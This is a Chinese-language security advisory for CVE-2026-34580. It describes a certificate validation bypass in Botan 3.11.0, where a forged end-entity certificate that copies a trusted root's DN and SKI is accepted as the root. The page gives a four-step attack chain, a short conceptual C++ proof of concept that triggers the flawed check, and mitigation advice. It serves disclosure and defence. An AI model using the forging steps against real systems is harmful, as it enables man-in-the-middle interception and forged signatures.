CVE-2026-34580 CVSS 7.5 高危

CVE-2026-34580 Botan证书验证绕过漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34580

漏洞类型

证书验证绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Botan

漏洞概述

Botan是一个C++加密库。在3.11.0版本中，`Certificate_Store::certificate_known`函数存在逻辑缺陷。该函数仅检查DN和SKI匹配，未验证证书是否完全一致，导致路径验证逻辑错误。攻击者可利用此漏洞，使终端实体证书被误认为是受信任的根证书，从而绕过安全验证，造成完整性破坏。该漏洞已在3.11.1版本中修复。

技术细节

该漏洞源于Botan 3.11.0版本对`Certificate_Store::certificate_known`函数的实现缺陷及路径验证逻辑的错误扩展。该函数本意是检查特定证书是否在存储中已知，但实际实现仅比较了证书的专有名称（DN）和主题密钥标识符（SKI），而非完整的证书指纹或公钥。3.11.0版本的路径验证逻辑错误地假设该函数仅在证书完全一致时才返回真。利用此漏洞，攻击者只需生成一个恶意终端实体证书，使其DN和SKI与系统中存储的某个受信任根证书相同。当该恶意证书被提交验证时，系统会错误地将其识别为受信任根证书，立即接受其有效性，从而绕过了正常的信任链验证机制，导致中间人攻击或伪造签名成为可能。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用了 Botan 3.11.0 版本进行证书验证。

STEP 2

武器化

攻击者分析目标信任的根证书，提取其 DN 和 SKI，并生成一对新的公私钥。

STEP 3

利用

攻击者使用新生成的私钥签发一个终端实体证书，并强制该证书的 DN 和 SKI 与受信任的根证书完全一致。

STEP 4

攻击后果

攻击者向目标系统出示该伪造证书，Botan 的 `certificate_known` 函数返回 true，系统将其误认为受信任根，导致验证绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for demonstrating the logic flaw in Botan 3.11.0
// This code simulates the behavior where a non-identical certificate
// is accepted because DN and SKI match.

#include <botan/certstor.h>
#include <botan/x509cert.h>
#include <iostream>

int main() {
    // Load a trusted root certificate (e.g., RootCA)
    auto trusted_root = Botan::X509_Certificate("trusted_root.pem");

    // Create a Certificate_Store containing the root
    Botan::Certificate_Store_In_Memory cert_store;
    cert_store.add_certificate(trusted_root);

    // Attacker creates a malicious End Entity (EE) certificate
    // with the SAME DN and SKI as the trusted root, but different keys.
    // In a real attack, this cert would be generated by the attacker.
    auto malicious_ee = Botan::X509_Certificate("malicious_ee_same_dn.pem");

    // Vulnerable check in Botan 3.11.0
    // The function 'certificate_known' checks DN/SKI match, not identity.
    bool is_known = cert_store.certificate_known(malicious_ee);

    if (is_known) {
        std::cout << "[!] Vulnerability Triggered: Malicious certificate accepted as trusted!" << std::endl;
        std::cout << "    The library mistakenly believes the EE cert is the Root CA." << std::endl;
    } else {
        std::cout << "[+] Safe: Certificate correctly rejected." << std::endl;
    }

    return 0;
}

影响范围

Botan 3.11.0

防御指南

临时缓解措施

如果无法立即升级，应在应用层实施额外的证书完整性校验，确保不仅比对 DN 和 SKI，还要比对完整的证书指纹或公钥哈希，防止伪造证书通过验证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表